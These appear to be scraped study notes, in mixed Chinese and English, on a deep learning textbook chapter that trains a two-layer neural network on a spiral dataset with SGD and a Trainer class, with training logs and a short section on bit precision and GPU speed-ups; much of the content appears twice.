        self.loss_layer = SoftmaxWithLoss()
        # collect all weights and gradients into lists
        self.params, self.grads = [], []
        for layer in self.layers:
            self.params += layer.params
            self.grads += layer.grads

    def predict(self, x):
        for layer in self.layers:
            x = layer.forward(x)
        return x

    def forward(self, x, t):
        score = self.predict(x)
        loss = self.loss_layer.forward(score, t)
        return loss

    def backward(self, dout=1):
        dout = self.loss_layer.backward(dout)
        for layer in reversed(self.layers):
            dout = layer.backward(dout)
        return dout

1.4.3 The training code

import sys
sys.path.append('..')  # setting for importing files from the parent directory
import numpy as np
from common.optimizer import SGD
from dataset import spiral
import matplotlib.pyplot as plt

# hyperparameters
max_epoch = 300
batch_size = 30
hidden_size = 10
learning_rate = 1.0

x, t = spiral.load_data()
model = TwoLayerNet(input_size=2, hidden_size=hidden_size, output_size=3)
optimizer = SGD(lr=learning_rate)

# variables used during training
data_size = len(x)
max_iters = data_size // batch_size
total_loss = 0
loss_count = 0
loss_list = []

for epoch in range(max_epoch):
    # During training, the data for each mini-batch must be chosen at random.
    # Shuffle with np.random.permutation(): given N, it returns a random
    # permutation of 0 .. N-1.
    idx = np.random.permutation(data_size)
    x = x[idx]
    t = t[idx]

    for iters in range(max_iters):
        batch_x = x[iters*batch_size:(iters+1)*batch_size]
        batch_t = t[iters*batch_size:(iters+1)*batch_size]

        # compute the gradients and update the parameters
        loss = model.forward(batch_x, batch_t)
        model.backward()
        optimizer.update(model.params, model.grads)

        total_loss += loss
        loss_count += 1

        # periodically report training progress
        if (iters+1) % 10 == 0:
            avg_loss = total_loss / loss_count
            print('| epoch %d | iter %d / %d | loss %.2f'
                  % (epoch + 1, iters + 1, max_iters, avg_loss))
            loss_list.append(avg_loss)
            total_loss, loss_count = 0, 0
| epoch 1 |  iter 10 / 10 | loss 1.13
| epoch 2 |  iter 10 / 10 | loss 1.13
| epoch 3 |  iter 10 / 10 | loss 1.12
...
| epoch 298 |  iter 10 / 10 | loss 0.11
| epoch 299 |  iter 10 / 10 | loss 0.11
| epoch 300 |  iter 10 / 10 | loss 0.11
# plot the training curve
plt.plot(np.arange(len(loss_list)), loss_list, label='train')
plt.xlabel('iterations (x10)')
plt.ylabel('loss')
plt.show()


(figure)

# plot the decision boundary
h = 0.001
x_min, x_max = x[:, 0].min() - .1, x[:, 0].max() + .1
y_min, y_max = x[:, 1].min() - .1, x[:, 1].max() + .1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
X = np.c_[xx.ravel(), yy.ravel()]
score = model.predict(X)
predict_cls = np.argmax(score, axis=1)
Z = predict_cls.reshape(xx.shape)
plt.contourf(xx, yy, Z)
plt.axis('off')

# plot the data points
x, t = spiral.load_data()
N = 100
CLS_NUM = 3
markers = ['o', 'x', '^']
for i in range(CLS_NUM):
    plt.scatter(x[i*N:(i+1)*N, 0], x[i*N:(i+1)*N, 1], s=40, marker=markers[i])
plt.show()

    png

    1.4.4 Trainer 类

    将执行神经网络的学习封装成一个类。

    import sys
    sys.path.append('..')
    from common.optimizer import SGD
    from common.trainer import Trainer
    from dataset import spiral

    max_epoch = 300
    batch_size = 30
    hidden_size = 10
    learning_rate = 1.0
    x, t = spiral.load_data()
    model = TwoLayerNet(input_size=2, hidden_size=hidden_size, output_size=3)
    optimizer = SGD(lr=learning_rate)
    trainer = Trainer(model, optimizer)
    """
    x: 输入数据
    t: 监督标签
    max_epoch (= 10): 进行学习的 epoch 数
    batch_size(= 32): mini-batch 的大小
    eval_interval(= 20): 输出结果(平均损失等)的间隔。
    例如设置 eval_interval=20,则每 20 次迭代计算 1 次平均损失,并将结果输出到界面上。
    max_grad(= None): 梯度的最大范数。
    """
    trainer.fit(x, t, max_epoch, batch_size, eval_interval=10)
    trainer.plot()
    | epoch 1 |  iter 1 / 10 | time 0[s] | loss 1.10| epoch 2 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 3 |  iter 1 / 10 | time 0[s] | loss 1.13| epoch 4 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 5 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 6 |  iter 1 / 10 | time 0[s] | loss 1.10| epoch 7 |  iter 1 / 10 | time 0[s] | loss 1.14| epoch 8 |  iter 1 / 10 | time 0[s] | loss 1.16| epoch 9 |  iter 1 / 10 | time 0[s] | loss 1.11| epoch 10 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 11 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 12 |  iter 1 / 10 | time 0[s] | loss 1.12| epoch 13 |  iter 1 / 10 | time 0[s] | loss 1.10| epoch 14 |  iter 1 / 10 | time 0[s] | loss 1.09| epoch 15 |  iter 1 / 10 | time 0[s] | loss 1.08| epoch 16 |  iter 1 / 10 | time 0[s] | loss 1.04| epoch 17 |  iter 1 / 10 | time 0[s] | loss 1.03| epoch 18 |  iter 1 / 10 | time 0[s] | loss 0.94| epoch 19 |  iter 1 / 10 | time 0[s] | loss 0.92| epoch 20 |  iter 1 / 10 | time 0[s] | loss 0.92| epoch 21 |  iter 1 / 10 | time 0[s] | loss 0.87| epoch 22 |  iter 1 / 10 | time 0[s] | loss 0.85| epoch 23 |  iter 1 / 10 | time 0[s] | loss 0.80| epoch 24 |  iter 1 / 10 | time 0[s] | loss 0.79| epoch 25 |  iter 1 / 10 | time 0[s] | loss 0.78| epoch 26 |  iter 1 / 10 | time 0[s] | loss 0.83| epoch 27 |  iter 1 / 10 | time 0[s] | loss 0.77| epoch 28 |  iter 1 / 10 | time 0[s] | loss 0.76| epoch 29 |  iter 1 / 10 | time 0[s] | loss 0.77| epoch 30 |  iter 1 / 10 | time 0[s] | loss 0.76| epoch 31 |  iter 1 / 10 | time 0[s] | loss 0.77| epoch 32 |  iter 1 / 10 | time 0[s] | loss 0.75| epoch 33 |  iter 1 / 10 | time 0[s] | loss 0.78| epoch 34 |  iter 1 / 10 | time 0[s] | loss 0.77| epoch 35 |  iter 1 / 10 | time 0[s] | loss 0.78| epoch 36 |  iter 1 / 10 | time 0[s] | loss 0.74| epoch 37 |  iter 1 / 10 | time 0[s] | loss 0.75| epoch 38 |  iter 1 / 10 | time 0[s] | loss 0.77| epoch 39 |  iter 1 / 10 | time 0[s] | loss 0.75| epoch 40 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 41 |  iter 1 / 10 | time 0[s] | loss 0.75| epoch 42 |  iter 1 / 10 | time 0[s] | loss 0.76| epoch 43 |  iter 1 / 10 | time 0[s] | loss 0.79| epoch 44 |  iter 1 / 10 | time 0[s] | loss 0.74| epoch 45 |  iter 1 / 10 | time 0[s] | loss 0.75| epoch 46 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 47 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 48 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 49 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 50 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 51 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 52 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 53 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 54 |  iter 1 / 10 | time 0[s] | loss 0.74| epoch 55 |  iter 1 / 10 | time 0[s] | loss 0.74| epoch 56 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 57 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 58 |  iter 1 / 10 | time 0[s] | loss 0.69| epoch 59 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 60 |  iter 1 / 10 | time 0[s] | loss 0.70| epoch 61 |  iter 1 / 10 | time 0[s] | loss 0.69| epoch 62 |  iter 1 / 10 | time 0[s] | loss 0.71| epoch 63 |  iter 1 / 10 | time 0[s] | loss 0.70| epoch 64 |  iter 1 / 10 | time 0[s] | loss 0.71| epoch 65 |  iter 1 / 10 | time 0[s] | loss 0.72| epoch 66 |  iter 1 / 10 | time 0[s] | loss 0.71| epoch 67 |  iter 1 / 10 | time 0[s] | loss 0.71| epoch 68 |  iter 1 / 10 | time 0[s] | loss 0.71| epoch 69 |  iter 1 / 10 | time 0[s] | loss 0.70| epoch 70 |  iter 1 / 10 | time 0[s] | loss 0.68| epoch 71 |  iter 1 / 10 | time 0[s] | loss 0.73| epoch 72 |  iter 1 / 10 | time 0[s] | loss 0.66| epoch 73 |  iter 1 / 10 | 
time 0[s] | loss 0.69| epoch 74 |  iter 1 / 10 | time 0[s] | loss 0.66| epoch 75 |  iter 1 / 10 | time 0[s] | loss 0.70| epoch 76 |  iter 1 / 10 | time 0[s] | loss 0.65| epoch 77 |  iter 1 / 10 | time 0[s] | loss 0.67| epoch 78 |  iter 1 / 10 | time 0[s] | loss 0.70| epoch 79 |  iter 1 / 10 | time 0[s] | loss 0.63| epoch 80 |  iter 1 / 10 | time 0[s] | loss 0.66| epoch 81 |  iter 1 / 10 | time 0[s] | loss 0.65| epoch 82 |  iter 1 / 10 | time 0[s] | loss 0.66| epoch 83 |  iter 1 / 10 | time 0[s] | loss 0.64| epoch 84 |  iter 1 / 10 | time 0[s] | loss 0.62| epoch 85 |  iter 1 / 10 | time 0[s] | loss 0.62| epoch 86 |  iter 1 / 10 | time 0[s] | loss 0.63| epoch 87 |  iter 1 / 10 | time 0[s] | loss 0.59| epoch 88 |  iter 1 / 10 | time 0[s] | loss 0.58| epoch 89 |  iter 1 / 10 | time 0[s] | loss 0.61| epoch 90 |  iter 1 / 10 | time 0[s] | loss 0.59| epoch 91 |  iter 1 / 10 | time 0[s] | loss 0.58| epoch 92 |  iter 1 / 10 | time 0[s] | loss 0.57| epoch 93 |  iter 1 / 10 | time 0[s] | loss 0.55| epoch 94 |  iter 1 / 10 | time 0[s] | loss 0.54| epoch 95 |  iter 1 / 10 | time 0[s] | loss 0.53| epoch 96 |  iter 1 / 10 | time 0[s] | loss 0.54| epoch 97 |  iter 1 / 10 | time 0[s] | loss 0.51| epoch 98 |  iter 1 / 10 | time 0[s] | loss 0.51| epoch 99 |  iter 1 / 10 | time 0[s] | loss 0.50| epoch 100 |  iter 1 / 10 | time 0[s] | loss 0.47| epoch 101 |  iter 1 / 10 | time 0[s] | loss 0.49| epoch 102 |  iter 1 / 10 | time 0[s] | loss 0.46| epoch 103 |  iter 1 / 10 | time 0[s] | loss 0.44| epoch 104 |  iter 1 / 10 | time 0[s] | loss 0.47| epoch 105 |  iter 1 / 10 | time 0[s] | loss 0.44| epoch 106 |  iter 1 / 10 | time 0[s] | loss 0.43| epoch 107 |  iter 1 / 10 | time 0[s] | loss 0.43| epoch 108 |  iter 1 / 10 | time 0[s] | loss 0.39| epoch 109 |  iter 1 / 10 | time 0[s] | loss 0.40| epoch 110 |  iter 1 / 10 | time 0[s] | loss 0.41| epoch 111 |  iter 1 / 10 | time 0[s] | loss 0.38| epoch 112 |  iter 1 / 10 | time 0[s] | loss 0.38| epoch 113 |  iter 1 / 10 | time 0[s] | loss 0.38| epoch 114 |  iter 1 / 10 | time 0[s] | loss 0.37| epoch 115 |  iter 1 / 10 | time 0[s] | loss 0.36| epoch 116 |  iter 1 / 10 | time 0[s] | loss 0.34| epoch 117 |  iter 1 / 10 | time 0[s] | loss 0.35| epoch 118 |  iter 1 / 10 | time 0[s] | loss 0.33| epoch 119 |  iter 1 / 10 | time 0[s] | loss 0.35| epoch 120 |  iter 1 / 10 | time 0[s] | loss 0.33| epoch 121 |  iter 1 / 10 | time 0[s] | loss 0.33| epoch 122 |  iter 1 / 10 | time 0[s] | loss 0.32| epoch 123 |  iter 1 / 10 | time 0[s] | loss 0.31| epoch 124 |  iter 1 / 10 | time 0[s] | loss 0.31| epoch 125 |  iter 1 / 10 | time 0[s] | loss 0.31| epoch 126 |  iter 1 / 10 | time 0[s] | loss 0.30| epoch 127 |  iter 1 / 10 | time 0[s] | loss 0.30| epoch 128 |  iter 1 / 10 | time 0[s] | loss 0.27| epoch 129 |  iter 1 / 10 | time 0[s] | loss 0.30| epoch 130 |  iter 1 / 10 | time 0[s] | loss 0.28| epoch 131 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 132 |  iter 1 / 10 | time 0[s] | loss 0.27| epoch 133 |  iter 1 / 10 | time 0[s] | loss 0.27| epoch 134 |  iter 1 / 10 | time 0[s] | loss 0.28| epoch 135 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 136 |  iter 1 / 10 | time 0[s] | loss 0.28| epoch 137 |  iter 1 / 10 | time 0[s] | loss 0.25| epoch 138 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 139 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 140 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 141 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 142 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 143 |  iter 1 / 10 | time 0[s] | loss 0.26| epoch 144 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 
145 |  iter 1 / 10 | time 0[s] | loss 0.24| epoch 146 |  iter 1 / 10 | time 0[s] | loss 0.24| epoch 147 |  iter 1 / 10 | time 0[s] | loss 0.25| epoch 148 |  iter 1 / 10 | time 0[s] | loss 0.21| epoch 149 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 150 |  iter 1 / 10 | time 0[s] | loss 0.22| epoch 151 |  iter 1 / 10 | time 0[s] | loss 0.22| epoch 152 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 153 |  iter 1 / 10 | time 0[s] | loss 0.23| epoch 154 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 155 |  iter 1 / 10 | time 0[s] | loss 0.22| epoch 156 |  iter 1 / 10 | time 0[s] | loss 0.21| epoch 157 |  iter 1 / 10 | time 0[s] | loss 0.21| epoch 158 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 159 |  iter 1 / 10 | time 0[s] | loss 0.21| epoch 160 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 161 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 162 |  iter 1 / 10 | time 0[s] | loss 0.22| epoch 163 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 164 |  iter 1 / 10 | time 0[s] | loss 0.21| epoch 165 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 166 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 167 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 168 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 169 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 170 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 171 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 172 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 173 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 174 |  iter 1 / 10 | time 0[s] | loss 0.20| epoch 175 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 176 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 177 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 178 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 179 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 180 |  iter 1 / 10 | time 0[s] | loss 0.19| epoch 181 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 182 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 183 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 184 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 185 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 186 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 187 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 188 |  iter 1 / 10 | time 0[s] | loss 0.18| epoch 189 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 190 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 191 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 192 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 193 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 194 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 195 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 196 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 197 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 198 |  iter 1 / 10 | time 0[s] | loss 0.17| epoch 199 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 200 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 201 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 202 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 203 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 204 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 205 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 206 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 207 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 208 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 209 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 210 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 211 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 212 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 213 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 214 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 215 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 216 
|  iter 1 / 10 | time 0[s] | loss 0.14| epoch 217 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 218 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 219 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 220 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 221 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 222 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 223 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 224 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 225 |  iter 1 / 10 | time 0[s] | loss 0.16| epoch 226 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 227 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 228 |  iter 1 / 10 | time 0[s] | loss 0.15| epoch 229 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 230 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 231 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 232 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 233 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 234 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 235 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 236 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 237 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 238 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 239 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 240 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 241 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 242 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 243 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 244 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 245 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 246 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 247 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 248 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 249 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 250 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 251 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 252 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 253 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 254 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 255 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 256 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 257 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 258 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 259 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 260 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 261 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 262 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 263 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 264 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 265 |  iter 1 / 10 | time 0[s] | loss 0.14| epoch 266 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 267 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 268 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 269 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 270 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 271 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 272 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 273 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 274 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 275 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 276 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 277 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 278 |  iter 1 / 10 | time 0[s] | loss 0.13| epoch 279 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 280 |  iter 1 / 10 | time 0[s] | loss 0.10| epoch 281 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 282 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 283 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 284 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 285 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 286 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 287 |  
iter 1 / 10 | time 0[s] | loss 0.11| epoch 288 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 289 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 290 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 291 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 292 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 293 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 294 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 295 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 296 |  iter 1 / 10 | time 0[s] | loss 0.12| epoch 297 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 298 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 299 |  iter 1 / 10 | time 0[s] | loss 0.11| epoch 300 |  iter 1 / 10 | time 0[s] | loss 0.11

    png

    1.5 计算的高速化

    1.5.1 位精度

    随着深度学习备受瞩目,最近的 GPU 已经开始支持 16 位半精度浮点数的存储与计算。另外,谷歌公司设计了一款名为 TPU 的专用芯片,可以支持 8 位计算。

    1.5.2 GPU(CuPy)

    CuPy 是基于 GPU 进行并行计算的库。要使用 CuPy,需要使用安装有 NVIDIA 的 GPU 的机器,并且需要安装 CUDA 这个面向 GPU 的通用并行计算平台。

    1.6 小结

    • 神经网络具有输入层、隐藏层和输出层

    • 通过全连接层进行线性变换,通过激活函数进行非线性变换

    • 全连接层和 mini-batch 处理都可以写成矩阵计算

    • 使用误差反向传播法可以高效地求解神经网络的损失的梯度

    • 使用计算图能够将神经网络中发生的处理可视化,这有助于理解正向传播和反向传播

    • 在神经网络的实现中,通过将组件模块化为层,可以简化实现

    • 数据的位精度和 GPU 并行计算对神经网络的高速化非常重要

    ]]>
    + 正文

1.4 Solving a Problem with a Neural Network

1.4.1 The Spiral Dataset

import sys
sys.path.append('..')  # setting to import files from the parent directory
from dataset import spiral
import matplotlib.pyplot as plt

x, t = spiral.load_data()
print('x', x.shape)  # (300, 2)
print('t', t.shape)  # (300, 3)
x (300, 2)
t (300, 3)
# Plot the data points
N = 100
CLS_NUM = 3
markers = ['o', 'x', '^']
for i in range(CLS_NUM):
    plt.scatter(x[i * N:(i + 1) * N, 0], x[i * N:(i + 1) * N, 1], s=40, marker=markers[i])
plt.show()

[Figure: scatter plot of the spiral dataset, 100 points per class]

1.4.2 Implementing the Neural Network

import sys
sys.path.append('..')
import numpy as np
from common.layers import Affine, Sigmoid, SoftmaxWithLoss


class TwoLayerNet:
    def __init__(self, input_size, hidden_size, output_size):
        I, H, O = input_size, hidden_size, output_size
        # Initialize the weights and biases
        W1 = 0.01 * np.random.randn(I, H)
        b1 = np.zeros(H)
        W2 = 0.01 * np.random.randn(H, O)
        b2 = np.zeros(O)
        # Create the layers
        self.layers = [Affine(W1, b1), Sigmoid(), Affine(W2, b2)]
        self.loss_layer = SoftmaxWithLoss()
        # Collect all the weights and gradients into lists
        self.params, self.grads = [], []
        for layer in self.layers:
            self.params += layer.params
            self.grads += layer.grads

    def predict(self, x):
        for layer in self.layers:
            x = layer.forward(x)
        return x

    def forward(self, x, t):
        score = self.predict(x)
        loss = self.loss_layer.forward(score, t)
        return loss

    def backward(self, dout=1):
        dout = self.loss_layer.backward(dout)
        for layer in reversed(self.layers):
            dout = layer.backward(dout)
        return dout
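
A quick smoke test of the class (my own example, reusing the spiral data x loaded in 1.4.1):

model = TwoLayerNet(input_size=2, hidden_size=10, output_size=3)
scores = model.predict(x)
print(scores.shape)  # (300, 3): one score per class for each of the 300 samples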

1.4.3 Code for Training

import sys
sys.path.append('..')  # setting to import files from the parent directory
import numpy as np
from common.optimizer import SGD
from dataset import spiral
import matplotlib.pyplot as plt

# Hyperparameters
max_epoch = 300
batch_size = 30
hidden_size = 10
learning_rate = 1.0

x, t = spiral.load_data()
model = TwoLayerNet(input_size=2, hidden_size=hidden_size, output_size=3)
optimizer = SGD(lr=learning_rate)

# Variables used during training
data_size = len(x)
max_iters = data_size // batch_size
total_loss = 0
loss_count = 0
loss_list = []

for epoch in range(max_epoch):
    # During training, mini-batches must be drawn at random.
    # Shuffle the data with np.random.permutation(): given N, it
    # returns a random permutation of 0 .. N-1.
    idx = np.random.permutation(data_size)
    x = x[idx]
    t = t[idx]

    for iters in range(max_iters):
        batch_x = x[iters*batch_size:(iters+1)*batch_size]
        batch_t = t[iters*batch_size:(iters+1)*batch_size]

        # Compute the gradients and update the parameters
        loss = model.forward(batch_x, batch_t)
        model.backward()
        optimizer.update(model.params, model.grads)

        total_loss += loss
        loss_count += 1

        # Periodically report training progress
        if (iters+1) % 10 == 0:
            avg_loss = total_loss / loss_count
            print('| epoch %d | iter %d / %d | loss %.2f'
                  % (epoch + 1, iters + 1, max_iters, avg_loss))
            loss_list.append(avg_loss)
            total_loss, loss_count = 0, 0
| epoch 1 |  iter 10 / 10 | loss 1.13
| epoch 2 |  iter 10 / 10 | loss 1.13
| epoch 3 |  iter 10 / 10 | loss 1.12
...
| epoch 299 |  iter 10 / 10 | loss 0.11
| epoch 300 |  iter 10 / 10 | loss 0.11
(log truncated; the average loss falls from about 1.13 to 0.11 over the 300 epochs)
# Plot the training results
plt.plot(np.arange(len(loss_list)), loss_list, label='train')
plt.xlabel('iterations (x10)')
plt.ylabel('loss')
plt.show()


[Figure: training loss curve over iterations]

# Plot the decision boundary
h = 0.001
x_min, x_max = x[:, 0].min() - .1, x[:, 0].max() + .1
y_min, y_max = x[:, 1].min() - .1, x[:, 1].max() + .1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
X = np.c_[xx.ravel(), yy.ravel()]
score = model.predict(X)
predict_cls = np.argmax(score, axis=1)
Z = predict_cls.reshape(xx.shape)
plt.contourf(xx, yy, Z)
plt.axis('off')

# Plot the data points
x, t = spiral.load_data()
N = 100
CLS_NUM = 3
markers = ['o', 'x', '^']
for i in range(CLS_NUM):
    plt.scatter(x[i*N:(i+1)*N, 0], x[i*N:(i+1)*N, 1], s=40, marker=markers[i])
plt.show()

[Figure: learned decision regions with the spiral data points overlaid]

1.4.4 The Trainer Class

The training procedure for a neural network is encapsulated in a class.

import sys
sys.path.append('..')
from common.optimizer import SGD
from common.trainer import Trainer
from dataset import spiral

max_epoch = 300
batch_size = 30
hidden_size = 10
learning_rate = 1.0
x, t = spiral.load_data()
model = TwoLayerNet(input_size=2, hidden_size=hidden_size, output_size=3)
optimizer = SGD(lr=learning_rate)
trainer = Trainer(model, optimizer)
"""
Parameters of trainer.fit:
x: input data
t: supervision labels
max_epoch (= 10): number of epochs to train
batch_size (= 32): mini-batch size
eval_interval (= 20): interval at which to report results (average loss etc.);
    e.g. with eval_interval=20 the average loss is computed and printed
    once every 20 iterations.
max_grad (= None): maximum norm of the gradients.
"""
trainer.fit(x, t, max_epoch, batch_size, eval_interval=10)
trainer.plot()
| epoch 1 |  iter 1 / 10 | time 0[s] | loss 1.10
| epoch 2 |  iter 1 / 10 | time 0[s] | loss 1.12
| epoch 3 |  iter 1 / 10 | time 0[s] | loss 1.13
...
| epoch 299 |  iter 1 / 10 | time 0[s] | loss 0.11
| epoch 300 |  iter 1 / 10 | time 0[s] | loss 0.11
(log truncated; the reported loss falls from about 1.10 to 0.11 over the 300 epochs)

[Figure: loss curve drawn by trainer.plot()]

1.5 Speeding Up Computation

1.5.1 Bit Precision

With deep learning attracting attention, recent GPUs have begun to support storing and computing 16-bit half-precision floating-point numbers. Google has also designed a dedicated chip called the TPU that supports 8-bit computation.
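
As a minimal sketch (mine, not the book's): NumPy can already store arrays at half precision, which halves the memory footprint; whether the arithmetic itself gets faster depends on the hardware.

import numpy as np

a = np.random.randn(3)    # float64 by default
b = a.astype(np.float16)  # half-precision copy
print(a.dtype, a.nbytes)  # float64 24
print(b.dtype, b.nbytes)  # float16 6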

